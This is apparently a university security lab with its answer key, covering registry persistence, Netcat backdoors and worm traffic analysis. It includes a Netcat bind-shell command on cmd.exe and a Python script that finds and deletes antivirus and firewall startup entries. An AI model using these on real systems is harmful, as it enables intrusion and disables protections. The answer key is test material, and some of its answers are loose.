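An added example (not from the lab and not an Ethereal feature) that does in code what the two display filters in step 8 do, tcp.flags == 2 for pure SYNs and tcp.flags == 0x12 for SYN/ACKs, over a list of packet summaries, and then goes one step further by flagging any host that sends pure SYNs to the same port on many distinct destinations, the pattern behind the port 25 and port 445 traffic asked about in Q 4.6 to Q 4.14. The summary lines are a constructed sample in a simple "src:sport > dst:dport flags=0xNN" form, not a real capture; a real script would take the same five fields from a pcap with a library such as scapy or dpkt.

```python
"""Summarise TCP handshake traffic the way the lab's Ethereal filters do.

Added example. SAMPLE_PACKETS is a constructed list of packet summaries in
an invented "src:sport > dst:dport flags=0xNN" form, not a real capture.
"""
from collections import Counter, defaultdict
import re

# TCP flag bits as they appear in the tcp.flags field.
TCP_FIN, TCP_SYN, TCP_RST, TCP_PSH, TCP_ACK = 0x01, 0x02, 0x04, 0x08, 0x10

# Constructed sample: one host fanning out SYNs to port 25 on many mail hosts,
# two SYNs to port 445, one ordinary web connection that completes.
SAMPLE_PACKETS = """\
192.168.1.7:1034 > 64.12.24.33:25 flags=0x02
192.168.1.7:1035 > 64.12.24.34:25 flags=0x02
192.168.1.7:1036 > 64.12.24.35:25 flags=0x02
192.168.1.7:1037 > 64.12.24.36:25 flags=0x02
192.168.1.7:1038 > 64.12.24.37:25 flags=0x02
192.168.1.7:1039 > 64.12.24.40:25 flags=0x02
64.12.24.40:25 > 192.168.1.7:1039 flags=0x12
192.168.1.7:1039 > 64.12.24.40:25 flags=0x10
192.168.1.7:1040 > 192.168.1.9:445 flags=0x02
192.168.1.7:1041 > 192.168.1.10:445 flags=0x02
192.168.1.20:3201 > 192.168.1.1:80 flags=0x02
192.168.1.1:80 > 192.168.1.20:3201 flags=0x12
192.168.1.20:3201 > 192.168.1.1:80 flags=0x18
"""

LINE_RE = re.compile(r"^(\S+):(\d+) > (\S+):(\d+) flags=0x([0-9a-fA-F]+)$")


def parse_packets(text):
    """Parse summary lines into dicts with src, sport, dst, dport and flags."""
    pkts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            pkts.append({"src": m.group(1), "sport": int(m.group(2)),
                         "dst": m.group(3), "dport": int(m.group(4)),
                         "flags": int(m.group(5), 16)})
    return pkts


def syn_by_dport(pkts):
    """Equivalent of tcp.flags == 2: connection attempts, by destination port."""
    return Counter(p["dport"] for p in pkts if p["flags"] == TCP_SYN)


def synack_by_server_port(pkts):
    """Equivalent of tcp.flags == 0x12: connections that were actually answered,
    counted by the server's port (the source port of the SYN/ACK)."""
    return Counter(p["sport"] for p in pkts if p["flags"] == TCP_SYN | TCP_ACK)


def fanout_hosts(pkts, threshold=5):
    """Hosts sending pure SYNs to one port on at least `threshold` distinct
    destinations: what a mass-mailer (25) or a network worm (445) looks like."""
    targets = defaultdict(set)
    for p in pkts:
        if p["flags"] == TCP_SYN:
            targets[(p["src"], p["dport"])].add(p["dst"])
    return {k: len(v) for k, v in targets.items() if len(v) >= threshold}


if __name__ == "__main__":
    pkts = parse_packets(SAMPLE_PACKETS)
    print("SYN attempts by port:", dict(syn_by_dport(pkts)))
    print("answered by server port:", dict(synack_by_server_port(pkts)))
    for (src, port), n in fanout_hosts(pkts).items():
        print(f"{src} sent SYNs to port {port} on {n} distinct hosts")
```

Comparing the two counters is the point of Q 4.8: many attempts to port 25 with few answers means the host is trying addresses it has harvested rather than talking to a mail server it knows, which is why the file-search activity on disk in Q 4.13 goes together with the port 25 traffic.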
Questions

Q1.1 List the keys you see in the registry, including the key you just added. Be sure to show the names and data of each key.

Screenshot #1 Take a screenshot of the failed system and attach it to your lab report.

Q1.2 Explain how the Infect.bat file infects the system so that the viral process "MrMalicious.exe" continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary.

Attachment #1 Create a batch file using the commands in Appendix A and B to remove the key in the following folder and add a new key with your name as the Name and no data:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Audio
Feel free to use existing batch files as a reference. Attach the code for this batch file to the end of your lab.

Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker's software would have to do in order to prevent a specific program from starting up, such as Norton Antivirus or ZoneAlarm Firewall. (Hint: The query command would be useful.)
Screenshot #2 Search through the registry accesses and locate the malicious key. Highlight the key in RegMon and take a screenshot. Include this with your lab for turn-in.

Q2.4 Why is it that not many hackers have used the registry to disable operating systems?

Screenshot #3 Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot.

Screenshot #4 Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program.

Q3.5 What does Ethereal show transpired between the 7.2 and Windows XP machines? Why did this occur?

Q3.6 What does this command show?
Q3.7 What happens when you restart the Windows XP machine and try to connect from the RedHat 7.2 machine with Netcat?

Screenshot #5 Take a screenshot of the entry running server.exe highlighted in the registry editor.

Q3.8 How can you detect malicious code such as the 8633 program running on your computer?

Q3.9 What should you do to avoid having malicious code such as this installed on your machine in the first place?

Turn-in Checklist

Turn in the:
- Answer sheet
- Screenshots 1-5
- Comments and Additions
Appendix A: Registry Commands via Windows Command Line

Console Registry Tool for Windows - version 3.0
Copyright (C) Microsoft Corp. 1981-2001. All rights reserved

REG Operation [Parameter List]

  Operation  [ QUERY | ADD | DELETE | COPY |
               SAVE | LOAD | UNLOAD | RESTORE |
               COMPARE | EXPORT | IMPORT ]

For help on a specific operation type:

  REG Operation /?

Examples:

  REG QUERY /?
  REG ADD /?
  REG DELETE /?
  REG COPY /?
  REG SAVE /?
  REG RESTORE /?
  REG LOAD /?
  REG UNLOAD /?
  REG COMPARE /?
  REG EXPORT /?
  REG IMPORT /?

Registry Add example parameters
REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]

  KeyName  [\\Machine\]FullKey
    Machine  Name of remote machine - omitting defaults to the current machine
             Only HKLM and HKU are available on remote machines
    FullKey  ROOTKEY\SubKey
      ROOTKEY  [ HKLM | HKCU | HKCR | HKU | HKCC ]
      SubKey   The full name of a registry key under the selected ROOTKEY

  /v   The value name, under the selected Key, to add
  /ve  adds an empty value name <no name> for the key
  /t   RegKey data types
       [ REG_SZ | REG_MULTI_SZ | REG_DWORD_BIG_ENDIAN |
         REG_DWORD | REG_BINARY | REG_DWORD_LITTLE_ENDIAN |
         REG_NONE | REG_EXPAND_SZ ]
       If omitted, REG_SZ is assumed
  /s   Specify one charactor that you use as the separator in your data
       string for REG_MULTI_SZ. If omitted, use "\0" as the separator
  /d   The data to assign to the registry ValueName being added
  /f   Force overwriting the existing registry entry without prompt

Examples:

  REG ADD \\ABC\HKLM\Software\MyCo
    Adds a key HKLM\Software\MyCo on remote machine ABC

  REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead
    Adds a value (name: Data, type: REG_BINARY, data: fe340ead)

  REG ADD HKLM\Software\MyCo /v MRU /t REG_MULTI_SZ /d fax\0mail
    Adds a value (name: MRU, type: REG_MUTLI_SZ, data: fax\0mail\0\0)

  REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d %%systemroot%%
    Adds a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%)
    Notice:  Use the double percentage ( %% ) inside the expand string

C:\Documents and Settings\default>
  • 20. Appendix B: Commands for batch files via the Windows command line.

The following was referenced from http://www.ss64.com/nt/ ; more detailed explanations can be found there as well. Note: some of these commands are version dependent.

An A-Z Index of the Windows NT/XP command line

ADDUSERS  Add or list users to/from a CSV file
ARP       Address Resolution Protocol
ASSOC     Change file extension associations
ASSOCIAT  One step file association
AT        Schedule a command to run at a later time
ATTRIB    Change file attributes
BROWSTAT  Get domain, browser and PDC info
CACLS     Change file permissions
CALL      Call one batch program from another
CD        Change Directory - move to a specific Folder
CHANGE    Change Terminal Server Session properties
CHKDSK    Check Disk - check and repair disk problems
CHKNTFS   Check the NTFS file system
CHOICE    Accept keyboard input to a batch file
CIPHER    Encrypt or Decrypt files/folders
CleanMgr  Automated cleanup of Temp files, recycle bin
CLEARMEM  Clear memory leaks
CLIP      Copy STDIN to the Windows clipboard
CLS       Clear the screen
CLUSTER   Windows Clustering
CMD       Start a new CMD shell
COLOR     Change colours of the CMD window
COMP      Compare the contents of two files or sets of files
COMPACT   Compress files or folders on an NTFS partition
COMPRESS  Compress individual files on an NTFS partition
CON2PRT   Connect or disconnect a Printer
CONVERT   Convert a FAT drive to NTFS
COPY      Copy one or more files to another location
CSVDE     Import or Export Active Directory data
DATE      Display or set the date
Dcomcnfg  DCOM Configuration Utility
DEFRAG    Defragment hard drive
DEL       Delete one or more files
DELPROF   Delete NT user profiles
DELTREE   Delete a folder and all subfolders
DevCon    Device Manager Command Line Utility
DIR       Display a list of files and folders
DIRUSE    Display disk usage
DISKCOMP  Compare the contents of two floppy disks
DISKCOPY  Copy the contents of one floppy disk to another
DNSSTAT   DNS Statistics
DOSKEY    Edit command line, recall commands, and create macros
DSADD     Add user (computer, group..) to active directory
DSQUERY   List items in active directory
DSMOD     Modify user (computer, group..) in active directory
ECHO      Display message on screen
  • 21.
ENDLOCAL  End localisation of environment changes in a batch file
ERASE     Delete one or more files
EXIT      Quit the CMD shell
EXPAND    Uncompress files
EXTRACT   Uncompress CAB files
FC        Compare two files
FDISK     Disk Format and partition
FIND      Search for a text string in a file
FINDSTR   Search for strings in files
FOR       Conditionally perform a command several times
FORFILES  Batch process multiple files
FORMAT    Format a disk
FREEDISK  Check free disk space (in bytes)
FSUTIL    File and Volume utilities
FTP       File Transfer Protocol
FTYPE     Display or modify file types used in file extension associations
GLOBAL    Display membership of global groups
GOTO      Direct a batch program to jump to a labelled line
HELP      Online Help
HFNETCHK  Network Security Hotfix Checker
IF        Conditionally perform a command
IFMEMBER  Is the current user in an NT Workgroup
INSTSRV   Install an NT Service
IPCONFIG  Configure IP
KILL      Remove a program from memory
LABEL     Edit a disk label
LOCAL     Display membership of local groups
LOGEVENT  Write text to the NT event viewer
LOGOFF    Log a user off
LOGTIME   Log the date and time in a file
MAPISEND  Send email from the command line
MEM       Display memory usage
MD        Create new folders
MODE      Configure a system device
MORE      Display output, one screen at a time
MOUNTVOL  Manage a volume mount point
MOVE      Move files from one folder to another
MOVEUSER  Move a user from one domain to another
MSG       Send a message
MSIEXEC   Microsoft Windows Installer
MSINFO    Windows NT diagnostics
MUNGE     Find and Replace text within file(s)
MV        Copy in-use files
NET       Manage network resources
NETDOM    Domain Manager
NETSH     Configure network protocols
NETSVC    Command-line Service Controller
NBTSTAT   Display networking statistics (NetBIOS over TCP/IP)
NETSTAT   Display networking statistics (TCP/IP)
NOW       Display the current Date and Time
NSLOOKUP  Name server lookup
NTBACKUP  Backup folders to tape
NTRIGHTS  Edit NT user account rights
PATH      Display or set a search path for executable files
PATHPING  IP trace utility
PAUSE     Suspend processing of a batch file and display a message
  • 22.
PERMS     Show permissions for a user
PERFMON   Performance Monitor
PING      Test a network connection
POPD      Restore the previous value of the current directory saved by PUSHD
PORTQRY   Display the status of ports and services
PRINT     Print a text file
PRNCNFG   Display, configure or rename a printer
PRNMNGR   Add, delete, list printers, set the default printer
PROMPT    Change the command prompt
PUSHD     Save and then change the current directory
QGREP     Search file(s) for lines that match a given pattern
RASDIAL   Manage RAS connections
RASPHONE  Manage RAS connections
RECOVER   Recover a damaged file from a defective disk
REG       Read, Set or Delete registry keys and values
REGEDIT   Import or export registry settings
REGSVR32  Register or unregister a DLL
REGINI    Change Registry Permissions
REM       Record comments (remarks) in a batch file
REN       Rename a file or files
REPLACE   Replace or update one file with another
RD        Delete folder(s)
RDISK     Create a Recovery Disk
RMTSHARE  Share a folder or a printer
ROBOCOPY  Robust File and Folder Copy
ROUTE     Manipulate network routing tables
RUNAS     Execute a program under a different user account
RUNDLL32  Run a DLL command (add/remove print connections)
SC        Service Control
SCLIST    Display NT Services
ScriptIt  Control GUI applications
SET       Display, set, or remove Windows NT environment variables
SETLOCAL  Begin localisation of environment changes in a batch file
SETX      Set environment variables permanently
SHARE     List or edit a file share or print share
SHIFT     Shift the position of replaceable parameters in a batch file
SHORTCUT  Create a windows shortcut (.LNK file)
SHOWGRPS  List the NT Workgroups a user is in
SHOWMBRS  List the members of an NT Workgroup
SHUTDOWN  Shutdown the computer
SHUTGUI   Shutdown the computer
SLEEP     Wait for x seconds
SOON      Schedule a command to run in the near future
SORT      Sort input
START     Start a separate window to run a specified program or command
SU        Switch User
SUBINACL  Edit file and folder Permissions, Ownership and Domain
SUBST     Associate a path with a drive letter
TASKLIST  List running applications and services
TIME      Display or set the system time
TIMEOUT   Delay processing of a batch file
TITLE     Set the window title for a CMD.EXE session
TOUCH     Change file timestamps
TRACERT   Trace route to a remote host
TREE      Graphical display of folder structure
TYPE      Display the contents of a text file
  • 23.
USRSTAT   List domain usernames and last login
VER       Display version information
VERIFY    Verify that files have been saved
VOL       Display a disk label
WHERE     Locate and display files in a directory tree
WHOAMI    Output the current UserName and domain
WINMSD    Windows NT Diagnostics
WINMSDP   Windows NT Diagnostics II
WMIC      WMI Command
XCACLS    Change file permissions
XCOPY     Copy files and folders
  • 24. Appendix C – Making a copy of a virtual machine

Follow these directions to set up your second virtual machine. Do this while the original winXPPro machine is powered off, so that the copied disk image is consistent.

On your RedHat 8.0 host, in the root directory, make a new directory called winXPProCopy:
  # cd /root
  # mkdir winXPProCopy
Copy all files from the winXPPro directory into this new directory:
  # cp winXPPro/* winXPProCopy/
This will take a while to complete.

Now set up the new virtual machine:
Start VMware and go to File -> New -> New Virtual Machine.
Choose Custom and click Next.
Select the operating system as Windows XP Professional.
Change the name of the new machine to winXPProCopy and change the directory to /root/winXPProCopy. Click Next.
Adjust the virtual memory so that you can run all three machines at the same time. Bring it down to 128 MB for now.
Select Bridged networking and click Next.
Choose "Use an existing virtual disk" and click Next.
Click Browse and choose the file called winXPPro.vmdk in the new directory. Click Finish.
This will create a new virtual machine on your host system.

You will need to change the IP address of the new WinXP virtual machine, because it is a byte-for-byte copy of the original and would otherwise conflict with it. Change it to the old WinXP machine's address + 1: if the original XP machine was w.x.y.z, make the copy w.x.y.z+1. To do this:
Start the new virtual machine.
Click Start -> Control Panel -> Network and Internet Connections -> Network Connections.
Right-click on Local Area Connection and choose Properties.
Select TCP/IP and click Properties.
Make your changes and click OK.
  • 25. Appendix D – Installation and use of Netcat
EXCERPTS FROM LAB 6: BACKDOORS AND TROJANS

Installing Netcat on the Windows machine
Start your main Windows machine (XP 1) and copy the \\57.35.10.10\secure_class\Tools\Windows directory to your computer. Unzip nc11nt.zip; it should automatically create a directory called nc11nt. Whenever you want to run Netcat you will have to go into this folder and run it from there (unless you add this directory to the PATH). Now install Netcat on the other XP machine too (XP 2).

Installing Netcat on the Linux machine
You should already have a file called netcat.tar.gz in your /home/tools directory. If you don't, get it from /mnt/nas4112/Tools/Linux/ after mounting the NAS server. Go into your /home/tools directory and execute the following commands:
  # tar xvfz netcat.tar.gz
  # cd netcat
  # make linux
  # cp nc /usr/local/sbin
The last command puts nc on the PATH, so you can run Netcat without specifying its directory.

Using Netcat
The executable is called nc on both operating systems and the options are the same on both. To run Netcat in client mode so that it sends data across a network, use
  # nc [IP address to send to] [port to send to]
(e.g. nc a.b.c.d 1234 sends data to port 1234 on machine a.b.c.d.)
All input comes from standard input, so whatever you type on the keyboard is sent to the other machine. Alternatively, to read data from a file and send it to the other machine, redirect the file into nc:
  # nc [IP address to send to] [port to send to] < [file to read from]
(e.g. nc a.b.c.d 1224 < testfile.txt sends the contents of testfile.txt.)
To stop Netcat, press Ctrl+C. There are several options Netcat can be run with, depending on what it is being used for.

The most common options are:
  -l  run in listening mode (wait for an inbound connection instead of making one)
  -p  the local port to listen on (used together with -l)
  -v  verbose mode, so that connection results are displayed
  -w  timeout in seconds for connects and final network reads
  -z  zero-I/O mode: complete the TCP handshake (or send an empty UDP packet) and report the result without sending any data; this is what makes Netcat usable as a port scanner
  -e  execute the given program once a connection is made, with its standard input and output attached to the connection

  • 26. Look at the README files on both systems under the Netcat folder to find out more about running Netcat; many uses for Netcat are described there.

To run Netcat in listen mode, use the -l and -p options:
  # nc -l -p [port to listen on]
If you want to store the input that is received, redirect the received data to a file:
  # nc -l -p [port to listen on] > [file to write to]
(e.g. nc -l -p 1224 > testfile.txt: whatever is received on port 1224 is written to testfile.txt.)
NOTE: Redirecting to a file with > overwrites whatever was previously in that file.

Netcat can also be used to scan ports (Netcat is in client mode for this):
  # echo QUIT | nc -v -w [seconds to wait] -z [IP address to scan] [port range to scan]
(e.g. echo QUIT | nc -v -w 3 -z a.b.c.d 1-200 scans ports 1 to 200 on a.b.c.d and prints a line for each port that accepted the connection.)

Netcat can also be used to create backdoors on systems. An attacker can push a shell between systems over any TCP or UDP port. The shell has the privileges of the user who started Netcat in listener mode on the machine being exploited. For example, if you are on the Linux machine and would like to execute commands on the Windows machine, set up the Netcat listener on the Windows machine with:
  # nc -l -p [port to listen on] -e cmd.exe
(e.g. nc -l -p 7777 -e cmd.exe pipes all input received on port 7777 to cmd.exe, which executes the commands and sends their output back over the connection.)
On the client side, simply type
  # nc [listening machine] [port to connect to]
(e.g. nc a.b.c.d 7777) and start typing your commands. On Windows XP SP2 the Windows Firewall will prompt before nc is allowed to listen (this is the alert captured in Screenshot #3); if the prompt is answered "keep blocking", the client's SYNs are silently dropped.
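The listener, file-transfer and -z scan commands above, as an added example that is not part of the original lab: a small Python re-implementation of those three Netcat modes with plain sockets, so the behaviour can be checked offline against a local listener. The address 127.0.0.1, the temporary file names and the SAMPLE payload are constructed for the demo, and FileListener, send_file, probe and scan are names chosen here, not Netcat's.

```python
"""Added example, not part of the original lab: the three Netcat modes the
appendix describes (a listener that writes what it receives to a file, a
client that sends a file, and the -z "zero-I/O" port scan) re-implemented
with plain sockets so they can be exercised offline against a local listener.
Addresses, ports, file names and the payload below are constructed for the demo."""
import os
import socket
import tempfile
import threading

# Constructed payload standing in for testfile.txt from the appendix.
SAMPLE = b"hello from the nc client\r\nsecond line\r\n"


def parse_port_range(spec):
    """Expand a Netcat-style port spec such as "1-200" or "22 80 443" into a list."""
    ports = []
    for token in spec.split():
        if "-" in token:
            lo, hi = (int(x) for x in token.split("-", 1))
            ports.extend(range(lo, hi + 1))
        else:
            ports.append(int(token))
    return ports


def probe(host, port, timeout=3.0):
    """`nc -w <timeout> -z host port`: complete the TCP handshake, send nothing,
    and report whether the port accepted the connection."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:  # refused, timed out or unreachable: port reported closed
            return False


def scan(host, spec, timeout=3.0):
    """`nc -v -w <timeout> -z host <range>`: the ports that answered, in spec order."""
    return [p for p in parse_port_range(spec) if probe(host, p, timeout)]


class FileListener(threading.Thread):
    """`nc -l -p <port> > outfile`: accept one client and write everything it
    sends to outfile (truncating it first, exactly as the shell's > does)."""

    def __init__(self, outfile, host="127.0.0.1", port=0):
        super().__init__(daemon=True)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))  # port 0 lets the OS pick a free port
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        self.outfile = outfile

    def run(self):
        conn, _ = self.sock.accept()
        with conn, open(self.outfile, "wb") as out:
            while True:
                chunk = conn.recv(4096)
                if not chunk:  # client closed its side: nc exits here too
                    break
                out.write(chunk)
        self.sock.close()


def send_file(host, port, path):
    """`nc host port < path`: stream the file to the listener, then close."""
    with open(path, "rb") as src, socket.create_connection((host, port), timeout=3) as s:
        s.sendall(src.read())
        s.shutdown(socket.SHUT_WR)


def demo():
    """Run listener, client and scanner against each other on 127.0.0.1 and
    return what each side observed."""
    tmp = tempfile.mkdtemp()
    src, dst = os.path.join(tmp, "testfile.txt"), os.path.join(tmp, "received.txt")
    with open(src, "wb") as f:
        f.write(SAMPLE)
    listener = FileListener(dst)
    listener.start()
    send_file("127.0.0.1", listener.port, src)
    listener.join(timeout=5)
    with open(dst, "rb") as f:
        received = f.read()
    # For the scan: one socket left listening (open) and one that is bound but
    # never called listen(), so the kernel refuses connections to it (closed).
    open_sock = FileListener(os.path.join(tmp, "unused.txt"))  # listening, thread not started
    closed_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    closed_sock.bind(("127.0.0.1", 0))
    closed_port = closed_sock.getsockname()[1]
    found = scan("127.0.0.1", f"{open_sock.port} {closed_port}", timeout=1)
    open_sock.sock.close()
    closed_sock.close()
    return {"received": received, "open": found,
            "open_port": open_sock.port, "closed_port": closed_port}


if __name__ == "__main__":
    print(demo())
```

The scan deliberately sends no payload, which is why `echo QUIT |` in the appendix's command line is harmless: with -z Netcat never writes the piped input, it only reports which ports completed the handshake.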
  • 27. Jason Orlosky, Phillip Michael, Todd Lyon
Lab Solutions

Q1.1 List the keys you see in the registry including the key you just added. Be sure to show the names and data of each key.
A1.1
  Name         Data
  (default)    (value not set)
  CMDstarter   "C:\WINDOWS\SYSTEM32\cmd.exe"
Other entries such as VMware may appear depending on what other programs have been installed. The above two are required.

Q1.2 Explain how the Infect.bat file infects the system so that the viral process "MrMalicious.exe" continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary.
A1.2 The Infect.bat file adds a value to the registry's Run key so that Infect.bat itself is executed at startup. This value has the name 'Process' with data "C:\WINDOWS\HiddenFolder\Infect.bat". The script then creates the directory named in that value's data. Each time it runs, it copies the viral file from its own (hidden) directory into C:\WINDOWS, renames it, and runs it. Once the user deletes the copy from the Windows directory he or she will think the virus is gone, but the original is still on the system in an inactive folder, and searching for MrMalicious will not find it because the hidden copy is stored under a different name.

Attachment #1 Create a batch file using the commands in Appendix A and B to remove the key in the following folder and add a new key with your Group## as the Name and no data.
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Audio
Feel free to use existing batch files as a reference. Attach the code for this batch file to the end of your lab.
Correct Code (the key path contains a space, so it must be quoted; /f suppresses the confirmation prompt so the batch file does not stall):

  • 28.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Audio" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Audio" /v Group##
exit

Slight variations of this code are acceptable, but the student must have the reg add line.

Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker's software would have to do in order to prevent a specific program from starting up, such as Norton AntiVirus or ZoneAlarm Firewall. (Hint: the query command would be useful.)
A1.3 A hacker would have to write software that searches the Run key for a string such as "firewall" or "antivirus" in either the value names or their data. The software could run the query command recursively over the Run key (reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s), parse the names and data it prints, determine whether an anti-virus or firewall entry exists, and delete that value with reg delete ... /v <name> /f. Note that this only stops the product from being launched at logon, and an entry whose name and command line do not contain the product's name would be missed by a plain string match.

Screenshot #1 Search through the registry accesses and locate the malicious key. Highlight the key in RegMon and take a screenshot. Include this with your lab for turn-in.
Screenshot #1 should look like the above.

Screenshot #2 Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot. Include this with your lab for turn-in.
The system will show a Windows startup screen but then go black and stay black. The disk I/O light will blink constantly on the VMware screen and the Windows OS will never boot.
Screenshot #2 should look like the attachment on the next page.
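A worked version of the A1.3 answer, added here as an example and not part of the lab's own materials, written in Python instead of a batch file so that the parsing and matching logic can be read and tested on any system. It parses `reg query` output, picks out Run values whose name or command line mentions a firewall or anti-virus product, emits the `reg delete` lines an attacker's batch file would run, and, for the defender, diffs two snapshots of the key the way the lab's monitoring does. RUN_KEYS, SECURITY_PATTERN and the SAMPLE_QUERY text are constructed or assumed; reg.exe is only invoked when the script runs on Windows.

```python
"""Added example, not part of the original lab, written in Python rather than
as a batch file: the A1.3 logic of searching auto-start entries for a firewall
or anti-virus product and removing it, plus the defender's counterpart of
diffing two snapshots of the Run key. reg.exe is only invoked on Windows; the
parsing and matching below run anywhere on the constructed sample output."""
import re
import subprocess
import sys

# Auto-start locations a virus would inspect. Writing HKLM needs Administrator.
RUN_KEYS = [
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
]
# Product words to look for in either the value name or its command line
# (assumed list; extend it for the products in your own environment).
SECURITY_PATTERN = re.compile(r"firewall|anti.?virus|zonealarm|norton|mcafee", re.I)

# One value line of `reg query` output: <name> <REG_type> <data>, whitespace separated.
_VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_[A-Z_]+)\s*(?P<data>.*)$")


def parse_reg_query(text):
    """Turn `reg query <key>` output into {value name: data}."""
    values = {}
    for line in text.splitlines():
        m = _VALUE_LINE.match(line)
        if m:
            values[m.group("name")] = m.group("data").strip()
    return values


def find_security_entries(values):
    """A1.3 attacker step: names of values whose name or data mention a security product."""
    return [name for name, data in values.items()
            if SECURITY_PATTERN.search(name) or SECURITY_PATTERN.search(data)]


def delete_commands(key, names):
    """The `reg delete` lines a batch file would run for each matching value."""
    return [f'reg delete "{key}" /v "{name}" /f' for name in names]


def diff_snapshots(before, after):
    """Defender's check (the monitoring half of the lab): values that appeared,
    vanished or changed between two snapshots of the same key."""
    added = {n: after[n] for n in after if n not in before}
    removed = {n: before[n] for n in before if n not in after}
    changed = {n: (before[n], after[n]) for n in before if n in after and before[n] != after[n]}
    return added, removed, changed


def query_run_key(key):
    """Snapshot a key on a live Windows machine via reg.exe (shipped since XP)."""
    out = subprocess.run(["reg", "query", key], capture_output=True, text=True, check=False)
    return parse_reg_query(out.stdout)


# Constructed sample in the layout reg.exe prints on Windows XP; the VMware
# entry is the one the lab expects, the other names and paths are illustrative.
SAMPLE_QUERY = """
! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
    VMware Tools\tREG_SZ\tC:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe
    Zone Labs Client\tREG_SZ\t"C:\\Program Files\\Zone Labs\\ZoneAlarm\\zlclient.exe"
    ccApp\tREG_SZ\t"C:\\Program Files\\Common Files\\Symantec Shared\\ccApp.exe"
    Process\tREG_SZ\tC:\\WINDOWS\\HiddenFolder\\Infect.bat
"""

if __name__ == "__main__":
    values = query_run_key(RUN_KEYS[0]) if sys.platform == "win32" else parse_reg_query(SAMPLE_QUERY)
    hits = find_security_entries(values)
    print("would remove:", hits)
    for cmd in delete_commands(RUN_KEYS[0], hits):
        print("  ", cmd)
    # Defender's view: the same key before Infect.bat ran (no 'Process' value) vs now.
    before = {k: v for k, v in values.items() if k != "Process"}
    print("added since baseline:", diff_snapshots(before, values)[0])
```

On the sample, only the ZoneAlarm entry is matched, because its command line contains the product name; the constructed ccApp entry, whose name and path mention neither "norton" nor "antivirus", is missed. That is the limit of the string-search approach in A1.3, and the reason the defender's snapshot diff, which does not care what an entry is called, is the more reliable side of this exercise.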
  • 29. Note: A screenshot of the deleted SOFTWARE hive is also permissible.

Q2.4 Why is it that not many hackers have used the registry to disable operating systems?
A2.4 Hackers generally try to accomplish a goal such as advertising for a company or setting up a money-making scheme. Disabling a user's operating system does nothing other than prevent users from accessing their files. That said, this type of attack could be crippling to a business where many financial or governmental documents are stored.

Screenshot #3 Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program.

Q3.5 What does Ethereal show transpired between the RedHat 7.2 and Windows XP machines? Why did this occur?
A3.5 The 7.2 machine keeps sending SYNs, but because the Windows Firewall is up all of the packets are dropped, so no connection is ever established.

  • 30. Q3.6 What does this command show?
A3.6 All open ports, both for this user and for the machine as a whole.

Q3.7 What happens when you restart the Windows XP machine and try to connect from the RedHat 7.2 machine with Netcat?
A3.7 You are still able to connect and gain Administrator access: the registry entry that runs server.exe restarts the listener at boot.

Screenshot #4 Take a screenshot of the entry running server.exe highlighted in the registry.
  • 31. Q3.8 How can you detect malicious code such as the 8633 program running on your computer?
A3.8 Using the Task Manager, and knowing what processes are running on your computer and what they are. Also by monitoring which ports are open and making sure new ones are not opened unexpectedly.

Q3.9 What should you do to avoid having malicious code such as this installed on your machine in the first place?
A3.9 Do not just run any program you receive; make sure it comes from a trusted vendor. Also, using a tool to monitor additions to the registry will help you catch malicious code such as this.

Q4.1 What is the name of the virus process loaded in memory?
A4.1 Rnathchk.exe

Q4.2 Is this process running a server?
A4.2 Yes

Q4.3 If yes, what port is it listening on?
A4.3 36276 (a randomly chosen port)

Q4.4 What type of server does this appear to be?
A4.4 FTP

Q4.5 Do you receive a login prompt?
A4.5 Yes

  • 32. S4.1 Take a screen capture of your FTP session.

Q4.6 What port number do you see a large number of connections to?
A4.6 445

Q4.7 Why do you think this is?
A4.7 The virus is trying to spread itself to other machines (port 445 is SMB over TCP).

Q4.8 What port are connections established to?
A4.8 25 and 48275

Q4.9 What is it connecting to these 2 different ports for?
A4.9 SMTP (mass mailing) and IRC (botnet command and control).

Q4.10 What is the virus repeatedly doing to the registry, and why do you think this is?
A4.10 It repeatedly re-adds its own startup entry, so that it is launched again at boot even if the entry is removed.

S4.2 Take a screen capture of this.

Q4.11 What is the name and path of the executable created once document.pif is executed?
A4.11 C:\windows\system32

Q4.12 There are 3 files created to replicate the virus on the hard drive. Where are they and what are their names?
A4.12 C:\pic.src
      C:\see_this!.pif
      C:\my_picture.scr

Q4.13 Why do you think the virus searches for files on the hard drive?
A4.13 To harvest e-mail addresses (this question is hard and the answer is not obvious).

Q4.14 What port is it trying to connect to and why?
A4.14 Port 445, to spread itself to other machines over SMB.

S4.3 Take a screen capture of this.

Q4.15 What is an advantage of active logging over active monitoring?
A4.15 With logging you can review every captured event after the fact, whereas with active monitoring you can only view what is happening right now.
